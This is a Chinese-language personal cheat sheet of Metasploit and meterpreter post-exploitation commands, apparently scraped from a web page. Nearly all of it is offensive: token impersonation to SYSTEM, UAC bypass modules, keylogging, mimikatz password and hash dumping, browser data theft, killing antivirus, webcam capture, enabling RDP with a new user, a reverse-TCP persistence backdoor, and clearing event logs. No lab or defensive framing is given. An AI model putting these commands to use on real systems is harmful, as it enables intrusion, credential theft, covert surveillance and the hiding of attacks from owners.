自用的msf命令總結

msf基礎命令

解決msfshell亂碼

chcp 65001

<code>   1chcp 65001 /<code>


加載模塊 use name 查看網絡配置 ifconfig 獲取進程列表 ps 查看所有exploit show exploits 查看所有payload show payloads 查看所有auxiliary show auxiliary 展示模塊詳細信息 info 查找模塊 search name 查看當前運行的模塊 jobs 重啟目標機器 reboot 關閉目標機器 shutdown 獲取交互shell shell 當前meterpreter到後臺 background 離開msf quit

<code> x   1加載模塊 2use name 3 4查看網絡配置 5ifconfig 6 7獲取進程列表 8ps 9 10查看所有exploit 11show exploits 12 13查看所有payload 14show payloads 15 16查看所有auxiliary 17show auxiliary 18 19展示模塊詳細信息 20info 21 22查找模塊 23search name 24 25查看當前運行的模塊 26jobs 27 28重啟目標機器 29reboot 30 31關閉目標機器 32shutdown 33 34獲取交互shell 35shell 36 37當前meterpreter到後臺 38background 39 40離開msf 41quit /<code>


msf後滲透模塊

基本功能

(1)系統信息獲取

(2)密碼哈希導出

(3)文件上傳下載

(4)屏幕截取

(5)鍵盤記錄

(6)權限提升

(7)跳板攻擊

(8)反追蹤

優點: 純內存工作模式,執行漏洞滲透攻擊的時候會直接裝載meterpreter的 動態鏈接庫到目標進程的空間中,使得meterpreter啟動隱蔽,很難被殺毒軟 件檢測到;


一、後滲透基本操作

1.基本命令


background # 讓meterpreter處於後臺模式 sessions -i index # 與會話進行交互,index表示第一個session quit # 退出會話 shell # 獲得控制檯權限 irb # 開啟ruby終端 2.文件操作命令 cat # 查看文件內容 getwd # 查看當前工作目錄 upload # 上傳文件到目標機上 download # 下載文件到本機上

<code> 19   1background # 讓meterpreter處於後臺模式 2 3sessions -i index # 與會話進行交互,index表示第一個session 4 5quit # 退出會話 6 7shell # 獲得控制檯權限 8 9irb # 開啟ruby終端 10 112.文件操作命令 12 13cat # 查看文件內容 14 15getwd # 查看當前工作目錄 16 17upload # 上傳文件到目標機上 18 19download # 下載文件到本機上 /<code>


來源: https://cloud.tencent.com/developer/article/1472206

端口轉發

portfwd add -l 6666 -p 3389 -r 127.0.0.1

設置Socks代理

Socks4a代理

use auxiliary/server/socks4a set srvhost 127.0.0.1 set srvport 1080 run

<code> 4   1use auxiliary/server/socks4a 2set srvhost 127.0.0.1 3set srvport 1080 4run /<code>

Socks5代理

use auxiliary/server/socks5 set USERNAME root set PASSWORD Password@ run

<code> 4   1use auxiliary/server/socks5 2set USERNAME root 3set PASSWORD Password@ 4run /<code>

添加路由

獲取網段信息 run get_local_subnets 查看幫助 run autoroute –h 添加到目標環境網絡 run autoroute -s 192.168.0.1/24 打印添加的路由 run autoroute –p 刪除路由 run autoroute -d -s 192.168.0.1/24

<code>   1獲取網段信息 2run get_local_subnets 3 4查看幫助 5run autoroute –h 6 7添加到目標環境網絡 8run autoroute -s 192.168.0.1/24 9 10打印添加的路由 11run autoroute –p 12 13刪除路由 14run autoroute -d -s 192.168.0.1/24 /<code>


execute執行文件

在目標機中執行文件 execute

創建新進程cmd.exe,-H不可見,-i交互 execute -H -i -f cmd.exe

-f:指定可執行文件 -H:創建一個隱藏進程 -a:傳遞給命令的參數 -i:跟進程進行交互 -m:從內存中執行 -t: 使用當前偽造的線程令牌運行進程 -s: 在給定會話中執行進程

<code> 13   1-f:指定可執行文件 2 3-H:創建一個隱藏進程 4 5-a:傳遞給命令的參數 6 7-i:跟進程進行交互 8 9-m:從內存中執行 10 11-t: 使用當前偽造的線程令牌運行進程 12 13-s: 在給定會話中執行進程 /<code>

migrate轉移進程

獲取當前進程PID getpid 獲取進程列表 ps 轉移進程 migrate PID 殺死進程 kill PID 自動進程遷移 run post/windows/manage/migrate 監聽設置自動轉移進程 set autorunscript migrate -f

<code>   1獲取當前進程PID 2getpid 3 4獲取進程列表 5ps 6 7轉移進程 8migrate PID 9 10殺死進程 11kill PID 12 13自動進程遷移 14run post/windows/manage/migrate 15 16監聽設置自動轉移進程 17set autorunscript migrate -f /<code>


令牌竊取

使用模塊 use incognito 查看可用token list_tokens -u 假冒SYSTEM權限 impersonate_token 'NT AUTHORITY\SYSTEM' 利用假冒身份執行命令 execute -f cmd.exe -i –t 或者直接shell即可 返回原始權限 rev2self

<code> x   1使用模塊 2use incognito 3 4查看可用token 5list_tokens -u 6 7假冒SYSTEM權限 8impersonate_token 'NT AUTHORITY\SYSTEM' 9 10利用假冒身份執行命令 11execute -f cmd.exe -i –t 12或者直接shell即可 13 14返回原始權限 15rev2self /<code>


提權相關

加載特權提升擴展模塊 use priv 獲取更多的特權 getprivs 查看補丁信息 run post/windows/gather/enum_patches 可利用exp提權檢測 use post/multi/recon/local_exploit_suggester 系統服務權限配置錯誤 use exploit/windows/local/service_permissions 註冊表鍵配置錯誤提取 use exploit/windows/local/always_install_elevated 可信任服務路徑 use exploit/windows/local/trusted_service_path

<code>   1加載特權提升擴展模塊 2use priv 3 4獲取更多的特權 5getprivs 6 7查看補丁信息 8run post/windows/gather/enum_patches 9 10可利用exp提權檢測 11use post/multi/recon/local_exploit_suggester 12 13系統服務權限配置錯誤 14use exploit/windows/local/service_permissions 15 16註冊表鍵配置錯誤提取 17use exploit/windows/local/always_install_elevated 18 19可信任服務路徑 20use exploit/windows/local/trusted_service_path /<code>


bypassuac

use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac_injection

use windows/local/bypassuac_vbs

use windows/local/ask

鍵盤鼠標設置

禁用鼠標 uictl disable mouse

禁用鍵盤 uictl disable keyboard

啟用鼠標 uictl enable mouse

啟用鍵盤 uictl enable keyboard

鍵盤記錄

開始鍵盤記錄 keyscan_start 導出記錄數據 keyscan_dump 結束鍵盤記錄 keyscan_stop

<code> 8   1開始鍵盤記錄 2keyscan_start 3 4導出記錄數據 5keyscan_dump 6 7結束鍵盤記錄 8keyscan_stop /<code>

信息蒐集

查看當前目錄 pwd getwd 查看目標主機信息 sysinfo 檢查目標機器閒置時間 idletime 獲取代理信息 getproxy 查看目標主機是否運行在虛擬機上 run checkvm run post/windows/gather/checkvm 獲取主機安裝軟件、補丁 run post/windows/gather/enum_applications run post/windows/gather/enum_patches #補丁信息 獲取目標主機環境變量 run post/multi/gather/env 獲取IE緩存 run post/windows/gather/enum_ie 獲取Chrome緩存 run post/windows/gather/enum_chrome 獲取Firefox緩存 run post/windows/gather/enum_firefox 列舉當前登錄的用戶 run post/windows/gather/enum_logged_on_users 查找域控 run post/windows/gather/enum_domain Windows憑證搜索 run post/windows/gather/enum_unattend 獲取辦公文檔 run post/windows/gather/dumplinks 獲取目標常見信息並保存到本地 run scraper 屏幕截圖 screenshot

<code>   1查看當前目錄 2pwd 3getwd 4 5查看目標主機信息 6sysinfo 7 8檢查目標機器閒置時間 9idletime 10 11獲取代理信息 12getproxy 13 14查看目標主機是否運行在虛擬機上 15run checkvm 16run post/windows/gather/checkvm 17 18獲取主機安裝軟件、補丁 19run post/windows/gather/enum_applications 20run post/windows/gather/enum_patches #補丁信息 21 22獲取目標主機環境變量 23run post/multi/gather/env 24 25獲取IE緩存 26run post/windows/gather/enum_ie 27 28獲取Chrome緩存 29run post/windows/gather/enum_chrome 30 31獲取Firefox緩存 32run post/windows/gather/enum_firefox 33 34列舉當前登錄的用戶 35run post/windows/gather/enum_logged_on_users 36 37查找域控 38run post/windows/gather/enum_domain 39 40Windows憑證搜索 41run post/windows/gather/enum_unattend 42 43獲取辦公文檔 44run post/windows/gather/dumplinks 45 46獲取目標常見信息並保存到本地 47run scraper 48 49屏幕截圖 50screenshot /<code>


密碼獲取

抓取自動登錄的用戶名和密碼 run post/windows/gather/credentials/windows_autologin

hashdump run post/windows/gather/smart_hashdump

mimikatz

加載 load mimikatz

獲取hash值 msv

獲取明文 Kerberos

獲取系統賬戶信息 wdigest


<code>


mimikatz_command -f samdump::hashes #執行mimikatz原始命令 mimikatz_command -f sekurlsa::searchPasswords

<code>   1mimikatz_command -f samdump::hashes #執行mimikatz原始命令 2mimikatz_command -f sekurlsa::searchPasswords /<code>


meterpreter > load mimikatz #加載mimikatz meterpreter > msv #獲取hash值 meterpreter > Kerberos #獲取明文 meterpreter > ssp #獲取明文信息 meterpreter > wdigest #獲取系統賬戶信息 meterpreter > mimikatz_command -f a:: #必須要以錯誤的模塊來讓正確的模塊顯示 meterpreter > mimikatz_command -f hash:: #獲取目標 hash meterpreter > mimikatz_command -f samdump::hashes meterpreter > mimikatz_command -f sekurlsa::searchPasswords

<code> x   1meterpreter > load mimikatz #加載mimikatz 2 3meterpreter > msv #獲取hash值 4 5meterpreter > Kerberos #獲取明文 6 7meterpreter > ssp #獲取明文信息 8 9meterpreter > wdigest #獲取系統賬戶信息 10 11meterpreter > mimikatz_command -f a:: #必須要以錯誤的模塊來讓正確的模塊顯示 12 13meterpreter > mimikatz_command -f hash:: #獲取目標 hash 14 15meterpreter > mimikatz_command -f samdump::hashes 16 17meterpreter > mimikatz_command -f sekurlsa::searchPasswords /<code>


流量抓取

查看網卡信息 run packetrecorder -L

查看流量 run packetrecorder -i

端口掃描、主機發現

使用arp發現主機 run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24

掃描tcp端口 run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389

防火牆、殺軟

關閉殺軟 run killav

查看防火牆狀態 run getcountermeasure

在shell中使用 netsh firewall show opmode

<code> 2   1在shell中使用 2netsh firewall show opmode /<code>

Hash傳遞

use exploit/windows/smb/psexec


攝像頭、屏幕

查看攝像頭信息 webcam_list

使用攝像頭拍照 webcam_snap

屏幕監視 run vnc

開啟遠程桌面

開啟遠程桌面 run post/windows/manage/enable_rdp

添加用戶 run post/windows/manage/enable_rdp USERNAME=gugugu PASSWORD=Root123456789

將3389端口轉發到6662端口 run post/windows/manage/enable_rdp FORWARD=true LPORT=6662

cmdshell升級

查看全部會話 sessions

選擇會話1 sessions 1

升級meterpreter sessions -u 會話id

持久化控制後門

run persistence -X -i 50 -p 4444 -r 192.168.1.7

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.109.137 set LPORT 4444 exploit

<code> 5   1use exploit/multi/handler 2set payload windows/meterpreter/reverse_tcp 3set LHOST 192.168.109.137 4set LPORT 4444 5exploit /<code>

run metsvc

針對linux平臺

目標主機保存的ssh身份驗證信息 run post/multi/gather/ssh_creds

擦屁股、清痕跡

刪除添加的賬號 C:\Windows\system32> net user 添加的用戶名 /del

刪除日誌 clearev

關閉所有session連接 sessions -K

事件日誌

查看事件日誌 run event_manager -i 清除事件日誌 run event_manager -c

<code> 5   1查看事件日誌 2run event_manager -i 3 4清除事件日誌 5run event_manager -c /<code>